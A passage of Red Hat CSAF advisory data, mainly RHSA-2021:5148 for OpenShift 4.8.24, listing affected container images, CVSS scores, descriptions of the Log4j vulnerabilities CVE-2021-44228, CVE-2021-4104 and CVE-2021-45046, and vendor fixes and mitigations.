"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-operator-bundle@sha256:90c3bac2bd24cf79249202fc7e7124c602fabb929147bcb5b98564a601b73b05_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:06ef75fc95f01c81ff8effe58060b0c7eada7436a4657087af7dcf34779b78a9_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:a8c9d81be0f59bf60bcdc03584d8093812a8552cb4e5f2926ae8474e41b193b2_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/cluster-logging-rhel8-operator@sha256:d16e91e1aeaac45aa51b7f2b0ebe548faa74b141e644e964f94c8ae4b5adc338_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-operator-bundle@sha256:f9eac45d398c5772be52b65e2d6e0bb857a60a4e0f4c789e5c72473855ba2b41_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:ab6b5992f1718a79b26cab831a3f96c46ac2354e34d7488576830e2e5e5f949c_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:e6d806d2223dc344244469a89430d9e60d5d4310e6ed626a6d6b0dfe5d191aa5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-proxy-rhel8@sha256:fb217034ad478016ece30afe0f892f407e0b5f8e7931962a1376310f87bb6e08_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:75cfb6204d4d74460451dbc0d3f046235f3f00261f5124e4c2616e6ef17e76ca_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:aa4897baa35b4d3c5d2f1b64ecc384bfd0088233da29b50da562622a01da71cd_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch-rhel8-operator@sha256:ee5026614e766aaaf52ba6437577c94235e2021d8d82b13d90960220d27d8ff8_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:458c0ecce2582cdaad4b1a179ba7cf22a3831fab833e8b38b6001662cef088d9_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:55fb246ff597b28fff584042a6dd86f3b0de83e1271e151aeb7836e1c127f08e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/elasticsearch6-rhel8@sha256:cbfac57572671eb995342bfd97e2671b60434ea688a759d05c61176ec4c6e49c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:959a047204a93d8d6460fafa7616ff154e8feb08a7c05d6867f99ec1a87ebf73_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:9f5f2df7b88610ec8ca085d2c48d527f3863b8c7e865786090df3040a51bda69_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/eventrouter-rhel8@sha256:c4480951503ca7072e946b1fde63bc7ef45eb60c7d62a8a2d204e972884266be_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:8e6e030a092c94af29c0fc50f79abcfd058aee14d929dfaea457bb39891c57fe_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e460881db1614b5fabbd938fa674f82e90524beb54ae2619acaf50665785892e_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/fluentd-rhel8@sha256:e5bab509f084458d27d3bb32fd82132ce03523bbec45ce4aa8f68837c0cfc2db_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:0599610c8e53b621fa1a6079cdc636477b38d5d1747c7221d67dda1b4a362258_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:588c93bed798115647759a8fa778fe5c0f4110ff31f863718453105d04c0a6f8_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/kibana6-rhel8@sha256:ba0909befb1bcc75437a1b389032e8cf9526692a5ee2ad610df0acd870aba9f0_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:41f878aefc6559950120527e2ae422a79c3d768b00885a5426fcae655aaae8b7_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:542269634b1bf21cb986f1618161b7b50f7871d61286e43d2b9acf39abf745f0_s390x",
"8Base-OSE-LOGGING-5.3:openshift-logging/log-file-metric-exporter-rhel8@sha256:daaf25c751e4562a4a06d4e30f33db2b01a2557e03053afc2dc4a85377ab4dc5_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:5eed6d7086407a59ff8a0750b64fc9b245dd12551db404bc13b9a4cd35a60c8c_ppc64le",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:9abe7a5c17765cce39f514185e81d19045370098f5cf44c444f401324c527c78_amd64",
"8Base-OSE-LOGGING-5.3:openshift-logging/logging-curator5-rhel8@sha256:cd0808c73ea0fb52b679800fd90641578d0788cb0cb63419b2c6c8d6c385da7d_s390x"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5148
Vulnerability from csaf_redhat
Published
2021-12-15 20:09
Modified
2024-12-12 01:19
Summary
Red Hat Security Advisory: OpenShift Container Platform 4.8.24 extras security update
Notes
Topic
Red Hat OpenShift Container Platform release 4.8.24 is now available with
updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.8.24 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5148",
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5148.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.8.24 extras security update",
"tracking": {
"current_release_date": "2024-12-12T01:19:09+00:00",
"generator": {
"date": "2024-12-12T01:19:09+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5148",
"initial_release_date": "2021-12-15T20:09:32+00:00",
"revision_history": [
{
"date": "2021-12-15T20:09:32+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-16T16:08:07+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:19:09+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.8",
"product": {
"name": "Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.8::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"product": {
"name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"product_id": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.8.0-202112150431.p0.gebd9cb4.assembly.art3599"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"product_id": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.8.0-202112150431.p0.g0d7ecfb.assembly.art3599"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.8.0.202112150431.p0.g0d7ecfb.assembly.art3599-1"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64",
"product": {
"name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64",
"product_id": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-presto\u0026tag=v4.8.0-202112150431.p0.g4b934ae.assembly.art3599"
}
}
}
],
"category": "architecture",
"name": "amd64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64"
},
"product_reference": "openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64"
},
"product_reference": "openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64 as a component of Red Hat OpenShift Container Platform 4.8",
"product_id": "8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
},
"product_reference": "openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64",
"relates_to_product_reference": "8Base-RHOSE-4.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-4104",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-13T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2031667"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Java logging library Apache Log4j in version 1.x. JMSAppender in Log4j 1.x is vulnerable to deserialization of untrusted data. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender and to the attacker\u0027s JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Based on the conditions to be exploitable (see details below), the risk is much lower than Log4j 2.x and Red Hat has assessed this to be Moderate severity. This flaw has been filed for Log4j 1.x, and the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228\n\nNote this flaw ONLY affects applications which are specifically configured to use JMSAppender, which is not the default, or when the attacker has write access to the Log4j configuration for adding JMSAppender to the attacker\u0027s JNDI LDAP endpoint. \n\nIf the Log4j configuration is set TopicBindingName or TopicConnectionFactoryBindingName configurations allowing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-44228 Log4j 2.x, Log4j 1.x is vulnerable. However, the attack vector is reduced as it depends on having write access, which is not a standard configuration rather than untrusted user input. These are sufficient factors beyond the attacker\u0027s control.\n\nThe tomcat package shipped with Red Hat Enterprise Linux does not include log4j but it does include a default configuration for log4j, log4j.properties, which could be used with tomcat if users choose to install and configure the library. The JMSAppender is not enabled by default, and the permissions of the file can only be modified as root.\n\nRed Hat Virtualization ships log4j12-1.2.17, but it is used and configured in a way which makes this flaw not possible to exploit. Therefore impact is rated Low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-4104"
},
{
"category": "external",
"summary": "RHBZ#2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-4104",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-4104"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-4104"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-990494126"
},
{
"category": "external",
"summary": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301",
"url": "https://github.com/apache/logging-log4j2/pull/608#issuecomment-991723301"
},
{
"category": "external",
"summary": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx",
"url": "https://lists.apache.org/thread/0x4zvtq92yggdgvwfgsftqrj4xx5w0nx"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/13/1",
"url": "https://www.openwall.com/lists/oss-security/2021/12/13/1"
}
],
"release_date": "2021-12-10T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-15T20:09:32+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.8/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5148"
},
{
"category": "workaround",
"details": "These are the possible mitigations for this flaw for releases version 1.x:\n\n- Comment out or remove JMSAppender in the Log4j configuration if it is used\n- Remove the JMSAppender class from the classpath. For example:\n```\nzip -q -d log4j-*.jar org/apache/log4j/net/JMSAppender.class\n```\n- Restrict access for the OS user on the platform running the application to prevent modifying the Log4j configuration by the attacker.",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-presto@sha256:2c449bb93534c6dc17961624ff67bd9e7ef07b5799367a4e0467f8dcadeaf35f_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender"
},
{
"cve": "CVE-2021-44228",
"cwe": {
"id": "CWE-20",
"name": "Improper Input Validation"
},
"discovery_date": "2021-12-10T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator-bundle@sha256:5cc4e959806f4e9cd47b5d8a505b8c6c86775632aee35908a0928bfeede818ad_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-ansible-operator@sha256:d0d3215ab63ee9893806eedf23fbb2b2237683fbe9c20138b1450f89a231092f_amd64",
"8Base-RHOSE-4.8:openshift4/ose-metering-hadoop@sha256:50ecba62addb91627e4adad209f95fb910cc16584a1437764e1585430fec30a1_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2030932"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.15.0. A remote attacker who can control log messages or log message parameters, can execute arbitrary code on the server via JNDI LDAP endpoint.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value",
"title": "Vulnerability summary"
},
{
"category": "other",
